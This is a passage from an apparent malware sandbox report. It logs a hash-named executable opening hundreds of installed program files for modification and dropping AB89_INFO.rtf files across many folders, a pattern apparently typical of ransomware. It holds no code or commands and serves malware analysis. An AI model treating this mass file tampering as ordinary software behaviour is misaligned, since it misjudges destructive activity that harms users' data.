modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\TraceApprove.vdx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Lagos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\DenyPing.xlt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-US.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Regina 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\InvokeRemove.rle 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ta.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\PushRemove.crw 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Edmonton 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\ext\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\_platform_specific\win_x64\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+1 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoBeta.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program 